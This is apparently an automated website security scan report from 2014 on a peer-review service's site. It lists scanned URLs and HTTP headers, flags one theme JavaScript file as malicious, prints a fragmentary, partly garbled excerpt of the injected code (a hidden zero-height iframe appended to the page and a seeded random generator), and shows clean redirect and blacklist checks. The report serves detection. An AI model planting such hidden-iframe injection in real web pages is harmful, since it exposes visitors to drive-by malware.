Scanned pages/files
Request | Server response | Status |
http://bestpeerreview.com/ | 200 OK Content-Length: 13198 Content-Type: text/html | clean |
http://bestpeerreview.com/misc/jquery.js?t | 200 OK Content-Length: 31089 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/misc/drupal.js?t | 200 OK Content-Length: 9834 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/sites/all/modules/nice_menus/nice_menus.js?t | 200 OK Content-Length: 1724 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/sites/all/modules/panels/js/panels.js?t | 200 OK Content-Length: 797 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/sites/all/modules/swftools/shared/swfobject2/swfobject.js?t | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/sites/all/themes/pa/js/general.js | 200 OK Content-Length: 7890 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function bookmark(url,title){ if (window.sidebar) window.sidebar.addPanel(title, url, ""); else if(window.opera && window.print){ var elem = document.createElement('a'); elem.setAttribute('href',url); elem.setAttribute('title',title); elem.setAttribute('rel','sidebar'); elem.click(); } else if(document.all) { window.external.AddFavorite(url, title); } else { alert("Press CTRL-D to bookmark"); } }try{prototype%2;}catch(as if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://bestpeerreview.com/form/live-support | 200 OK Content-Length: 8942 Content-Type: text/html | clean |
http://bestpeerreview.com/rss.xml | 200 OK Content-Length: 8517 Content-Type: application/rss+xml | clean |
http://bestpeerreview.com/test404page.js | 404 Not Found Content-Length: 4763 Content-Type: text/html | clean |
http://bestpeerreview.com/products | 200 OK Content-Length: 18343 Content-Type: text/html | clean |
http://bestpeerreview.com/about-us | 200 OK Content-Length: 7737 Content-Type: text/html | clean |
http://bestpeerreview.com/form/contact-us | 200 OK Content-Length: 9606 Content-Type: text/html | clean |
http://bestpeerreview.com/client-experiences | 200 OK Content-Length: 8389 Content-Type: text/html | clean |
http://bestpeerreview.com/security | 200 OK Content-Length: 7279 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bestpeerreview.com
Result:
HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 17 Jun 2014 09:37:11 GMT
Server: Apache/2.0.52 (Novell)
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 17 Jun 2014 09:37:11 GMT
Set-Cookie: SESS81f6b99a1113d6b75f082f4de7ee78ad=4ant87g40g7d80gjapscabmqk4; expires=Thu, 10 Jul 2014 13:10:31 GMT; path=/; domain=.bestpeerreview.com
GET / HTTP/1.1
Host: bestpeerreview.com
Result:
HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 17 Jun 2014 09:37:11 GMT
Server: Apache/2.0.52 (Novell)
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 17 Jun 2014 09:37:11 GMT
Set-Cookie: SESS81f6b99a1113d6b75f082f4de7ee78ad=4ant87g40g7d80gjapscabmqk4; expires=Thu, 10 Jul 2014 13:10:31 GMT; path=/; domain=.bestpeerreview.com
Second query (visit from search engine):
GET / HTTP/1.1
Host: bestpeerreview.com
Referer: http://www.google.com/search?q=bestpeerreview.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bestpeerreview.com
Referer: http://www.google.com/search?q=bestpeerreview.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bestpeerreview.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bestpeerreview.com/
Result: bestpeerreview.com is not infected or malware details are not published yet.
Result: bestpeerreview.com is not infected or malware details are not published yet.